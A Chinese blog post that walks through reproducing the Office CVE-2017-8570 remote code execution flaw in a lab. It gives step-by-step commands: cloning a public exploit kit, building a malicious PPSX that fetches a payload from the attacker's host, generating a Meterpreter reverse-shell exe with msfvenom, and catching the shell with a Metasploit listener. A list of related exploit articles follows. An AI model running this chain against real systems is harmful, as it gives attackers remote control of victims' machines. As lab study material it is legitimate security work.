Office CVE-2017-8570漏洞复现

最新推荐文章于 2024-05-13 03:42:30 发布
最新推荐文章于 2024-05-13 03:42:30 发布
阅读量2k 收藏 1
点赞数
分类专栏: 安全 漏洞 文章标签: 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44283446/article/details/122035825
版权

Office CVE-2017-8570漏洞复现

说明

本文仅供学习使用。如有不足,请多指正。

描述

2017年7月,微软在例行的阅读补丁中修复了多个Microsoft Office漏洞,其中的CVE-2017-8570漏洞为一个逻辑漏洞。网上公布了利用代码,影响范围广泛。该漏洞为Microsoft Office的一个远程代码执行漏洞。其成因是Microsof PowerPoint执行时会初始化“script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows script Component)文件。可以欺骗用户运行含有该漏洞的PPT文件导致获取和当前登录用户相同的执行权限。

漏洞影响版本

Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)

环境说明

  • 攻击机:kali
  • 靶机:windows2016(已安装好64位的Microsoft Office 2016)

漏洞复现

  1. 下载漏洞exp到攻击机kali上。
    git clone https://github.com/tezukanice/Office8570.git
    在这里插入图片描述
  2. 切换到Office8570目录下,然后新建目录,将原本已有的ppsx文件另存到template。
    cd Office8570
    mkdir template
    mv template.ppsx template/
    在这里插入图片描述
    ps:如果此处不想创建文件夹,可以cd cve-2017-8570_toolkit.py进入文件中修改路径:
    在这里插入图片描述
  3. 在本地生成恶意的PPSX文件,这里的IP是攻击机的IP:
    python2 cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://#{IP}/logo.doc
    在这里插入图片描述
  4. 在kali上使用meterpreter的反弹木马生成反弹shell的exe文件。
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=#{IP} LPORT=#{PORT} -f exe > #{filename}
    在这里插入图片描述
  5. 设置监听。等待恶意ppsx文件的执行,继而接收ppsx请求来下载执行kali本地反弹木马shell(默认在80监听,ip为攻击机的ip地址)。
    python2 cve-2017-8570_toolkit.py -M exp -e http://#{ip}/#{filename} -l #{filename}
    在这里插入图片描述
  6. 新起一个攻击机的窗口,打开metasploit工具,使用multi/handler加载攻击模块,设置监听。
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost #{ip}
lhost => #{ip}

msf6 exploit(multi/handler) > set lport #{port}
lport => #{port}

msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on #{ip}:#{port}
  1. 将刚才生成的恶意的ppsx文件放在目标主机上执行,模拟用户点击黑客发送的恶意文件。
  2. 查看成功接收到目标机发送的获取payload的请求。
    在这里插入图片描述
  3. 查看MSF那边也已经获得shell。
    在这里插入图片描述

参考

https://zhuanlan.zhihu.com/p/40969485
http://www.noobyard.com/article/p-fiujnodz-ss.html
https://fish-o0o.github.io/2018/06/26/CVE-2017-8570

yuQnY
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Office CVE-2017-8570远程代码执行漏洞
脚本姑娘
01-12 1324
漏洞影响版本 很尴尬,此页无图 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 (32-bit editions) Microsoft Office 2010 Service Pack 2 (64-bit editions) Microsoft Office 201
Office 远程代码执行漏洞CVE-2017-8570)
zzgslh的博客
04-08 1155
漏洞详情】 Office一直是主流的办公软件,当 Microsoft Office 软件无法正确处理内存中的对象时,其中存在远程执行代码漏洞。成功利用此漏洞的攻击者可以使用经特殊设计的文件在当前用户的安全上下文中执行操作。CVE-2017-8570这个漏洞影响office所有发行版本,当用户不经意点击了我们的恶意PPSX文件,那么我们就可以直接获取到他的用户权限,危害性十分高。 【验证详情】...
ONLYOFFICE:开源、免费、安全,打造定制化办公平台的最佳选择_onlyoffice免费版(1)
最新发布
2401_84545830的博客
05-13 734
ONLYOFFICE编辑器为用户提供了一项强大的品牌定制功能,允许将编辑器界面替换为个性化的LOGO,同时支持根据用户需求进行界面定制。这意味着用户可以将编辑器打造成与其品牌完美契合的工具,并且可以根据团队或客户的具体要求灵活定制界面,提供个性化的工作环境。这一功能不仅增强了用户对品牌的认知,还为用户提供了更加灵活、符合需求的编辑器体验,从而加强了工作流程的效率和个性化体验。
Microsoft OfficeCVE-2017-11882、CVE-2022-30190) 漏洞
oiadkt的博客
04-23 595
Microsoft OfficeCVE-2017-11882、CVE-2022-30190) 漏洞
微软office远程代码执行漏洞CVE-2017-11882)
GUINEW的博客
11-28 2173
微软office远程代码执行漏洞CVE-2017-11882) metasploit-framework koadic
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address...
Microsoft Office MSDT代码执行漏洞CVE-2022-30190)漏洞
网安君的博客
06-01 2696
漏洞首次发在2022 年 5 月 27 日,由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件,通过 ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用 Windows 程序 msdt.exe,该程序用于运行各种 Windows 疑难解答程序包。此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用 ‘ms-msdt’ URI执行任意PowerShell代码。目前已知影
漏洞】Microsoft Office MSDT 远程代码执行漏洞CVE-2022-30190)
qq_17754023的博客
06-03 4755
0x01 Microsoft OfficeMicrosoft Office是由Microsoft(微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint等。0x02 漏洞简介该文档使用 Word 远程模板功能从远程网络服务器检索 HTML 文件,该服务器使用 ms-msdt MSProtocol URI 方案加载代码并执行 PowerShell,禁用宏,仍能通过MSDT功能执行代码(恶意 Word 文档通常用于通过宏执行代码)。......
kali下CVE-2017-8570利用实验
我的学习笔记
02-28 1599
参考:https://www.youtube.com/watch?v=jUhmPH_u6gshttps://github.com/tezukanice/Office8570https://www.symantec.com/security_response/vulnerability.jsp?bid=99445https://www.rapid7.com...
菜单相关新词
weixin_30847271的博客
05-29 187
populate英 [ˈpɒpjuleɪt] 美 [ˈpɑ:pjuleɪt] vt.居住于;生活于;移民于;落户于 accelerator英 [əkˈseləreɪtə(r)] 美 [ækˈsɛləˌretɚ] n.加速器;催速剂 OLE Object Linking and Embedding,对象连接与嵌入,简称OLE技术。OLE 不仅是桌面应用程序集...
Office CVE-2017-11882漏洞
weixin_43268670的博客
07-08 461
Office cve-2017-11882漏洞,配上社工稳的一批,直接getshell 漏洞影响版本: Office 365 Microsoft Office 2000 Microsoft Office 2003 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 Microsoft Office 2013 Service Pack 1 Microsoft Office ...
CVE-2017-8570微软office漏洞与研究
qq_38352420的博客
06-30 706
title: CVE-2017-8570微软office漏洞与研究 date: 2019-02-01 23:47:44 CVE-2017-8570微软office漏洞与研究 微软office漏洞背景 微软Office系统软件(Word/Excel/PowerPoint等),一直是电脑上最为常用的办公软件之一,在国内外都拥有大量的用户。另一方面,利用Office系列软件的漏洞进行网络攻击已经成为黑客惯用的手段,广泛运用于APT攻击,抓肉鸡,传播勒索病毒等。其中一种典型的攻击方式是“鱼叉攻击”:黑客将.
office ppsx逻辑漏洞CVE-2017-8570)
KAME_HOUSE
01-24 323
CVE-2017-8570影响office版本 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 (32-bit editions) Microsoft Office 2010 Service Pack 2 (64-bit editions) Microsoft Office 2013 RT Service Pack 1 Microsoft Office 2013 Service Pack 1 (32-bit
cve-2017-7504漏洞
08-23
您好!对于CVE-2017-7504漏洞,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 2. 搭建相应的环境:您可以在漏洞环境中使用Apache Struts 2漏洞测试框架,例如Metasploit或其他可用的漏洞测试工具。 3. 指定目标URL:使用合适的工具,指定目标URL以进行漏洞利用。通常,您需要提供目标系统上受影响的Struts 2应用程序的URL。 4. 发起攻击:使用漏洞利用工具执行相应的攻击代码。具体的攻击方法取决于您使用的工具和漏洞利用脚本。 请注意,漏洞属于未经授权的活动,可能违反法律法规,因此我们强烈建议仅在合法授权和合规测试范围内进行漏洞。此外,对于未经授权或非法目的使用该漏洞进行攻击是违法行为,且可能导致严重后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值